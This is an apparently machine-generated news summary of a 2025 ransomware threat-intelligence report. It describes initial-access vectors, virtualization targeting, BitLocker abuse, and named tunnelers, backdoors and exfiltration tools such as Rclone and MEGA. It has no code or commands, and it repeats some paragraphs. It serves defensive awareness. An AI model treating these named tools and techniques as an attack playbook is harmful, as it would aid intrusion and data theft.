Ethical Hacking News
Ransomware's Shifting Landscape: Trends, Techniques, and TTPs in a Evolving Threat Environment
In this article, we analyze key trends and techniques used by threat actors in 2025 ransomware incidents. We provide insights into the tactics, techniques, and procedures (TTPs) employed by threat actors to establish footholds, maintain presence, establish remote connections, and exfiltrate sensitive data from compromised systems.
With a record high number of victims posted to data leak sites in 2025, it is clear that ransomware operations continue to pose an ongoing threat to organizations worldwide. We analyze trends such as the continued importance of vulnerability management, the use of legitimate encryption tools, and the role of publicly available cloud services and utilities in exfiltrating sensitive data.
This report provides a comprehensive overview of the current state of ransomware tactics, techniques, and procedures in 2025. By examining the key trends and techniques used by threat actors, organizations can better understand the evolving threat landscape and develop effective strategies to mitigate and prevent future ransomware attacks.
Ransomware has become a pervasive threat since 2018, with financially motivated threat actors shaping the landscape. The RaaS business model has lowered the barrier to entry for threat actors, making it more accessible and common. The profitability of ransomware operations may be in decline due to improved cybersecurity practices, increased recovery capabilities, and declining ransom payment amounts. New players have emerged to fill the vacuum left by previous prolific RaaS groups, highlighting the ongoing threat posed by ransomware operations. Common techniques used by threat actors include exploitation of vulnerabilities, virtualization infrastructure targeting, and data exfiltration. Threat actors often rely on compromised credentials, tunnelers, backdoors, and legitimate remote access tools to establish a foothold in victim environments. The use of publicly available tools and utilities for data exfiltration and malicious activities continues to evolve.
Ransomware has become one of the most pervasive threats to organizations across almost every industry vertical and region since 2018. The financially motivated threat actors who shifted their monetization strategy to post-compromise ransomware deployments back then have been instrumental in shaping this landscape. According to recent data from Google Threat Intelligence, ransomware operations have evolved significantly over time, creating a robust ecosystem that has lowered the barrier to entry via the commoditization and specialization of the supporting underground communities.
The proliferation of the ransomware-as-a-service (RaaS) business model is just one example of how the ransomware landscape has changed. This model allows threat actors to easily deploy ransomware without needing extensive technical knowledge or resources, making it more accessible to a wider range of individuals and groups. As a result, ransomware attacks have become increasingly common and diverse.
Despite the growing threat, some indicators suggest that the overall profitability of ransomware operations may be in decline. Improved cybersecurity practices, increased ability of organizations to recover from ransomware attacks, and declining ransom payment amounts and rates are all contributing factors to this trend. Furthermore, numerous disruptions to the ransomware ecosystem over the years have impacted previously prolific RaaS groups like LockBit, ALPHV, Basta, and RansomHub.
However, new players such as Qilin and Akira RaaS have risen up to fill the vacuum left by these groups. According to recent data from Google Threat Intelligence, a record high number of victims were posted to data leak sites (DLS) in 2025, highlighting the ongoing threat posed by ransomware operations.
In this report, we analyze key trends and techniques used by threat actors in 2025 ransomware incidents. We observed that in a third of incidents, the initial access vector was confirmed or suspected exploitation of vulnerabilities, most often in common VPNs and firewalls. This is consistent with previous years' observations but highlights the continued importance of vulnerability management.
Threat actors also increasingly targeted virtualization infrastructure, an increase from 29% in 2024 to 43%. The use of legitimate encryption tools by threat actors in extortion operations was also observed. For example, in one incident, BitLocker was used to encrypt over 200 remote hosts.
Data exfiltration was another common technique used by threat actors, with 77 percent of analyzed ransomware intrusions including suspected data theft. Threat actors targeted a variety of sensitive data types, including legal, human resources, accounting, and business development data.
Remote management tools were also commonly used to support the attack lifecycle, albeit at slightly lower rates than in previous years.
Threat actors consistently relied on compromised credentials to establish a foothold in victim environments. Tunnelers, backdoors, or legitimate remote access tools were also employed by threat actors to maintain presence once inside victim environments.
The use of tunnelers, particularly those that are publicly available offerings such as PYSOXY, CHISEL, CLOUDFLARED, RPIVOT, and REVSOCKS.CLIENT alongside seemingly private tunnelers like LIONSHARE, VIPERTUNNEL, and BLUNDERBLIGHT was observed. Tunnelers were also used to establish initial access.
Threat actors often leveraged valid credentials, legitimate remote access tools or backdoors to establish a foothold in victim environments. The deployment of backdoors is particularly noteworthy; several backdoors including CORNFLAKE.V3.JAVASCRIPT, SQUIDGATE, FIREHAWK, HAVOCDEMON, and SMOKEDHAM were deployed.
In addition to leveraging valid credentials or legitimate remote access tools to establish a foothold in victim environments, threat actors also used various malicious utilities to tunnel and proxy traffic within victim networks. These included SYSTEMBC, VIPERTUNEL, PYSOXY, CLOUDFLARED, and OpenSSH.
Threat actors frequently leveraged brute force attacks to gain access to accounts on additional systems. We observed multiple ransomware operations that leveraged network access to subsidiaries of victims to subsequently access the victim's network.
During 2025, threat actors continued to use publicly available tools and utilities such as Rclone, MEGASync, Megatools, restic, and possibly Cyberduck to exfiltrate data. We observed threat actors targeting a variety of sensitive data types including legal, human resources, accounting, and business development data.
Threat actors also leveraged legitimate cloud services and infrastructure to exfiltrate stolen data, including Azure, AWS, Backblaze, Cloudzy, Filemail, Google Drive, and MEGA, and OneDrive.
Related Information:
https://www.ethicalhackingnews.com/articles/Ransomwares-Shifting-Landscape-Trends-Techniques-and-TTPs-in-a-Evolving-Threat-Environment-ehn.shtml
https://cloud.google.com/blog/topics/threat-intelligence/ransomware-ttps-shifting-threat-landscape/
https://cloud.google.com/blog/topics/threat-intelligence/ransomware-ttps-shifting-threat-landscape
https://www.cyberproof.com/blog/mid-year-threat-landscape-report-top-ransomware-trends-ttps-and-defense-strategies-for-2025/
Published: Mon Mar 16 11:58:43 2026 by llama3.2 3B Q4_K_M
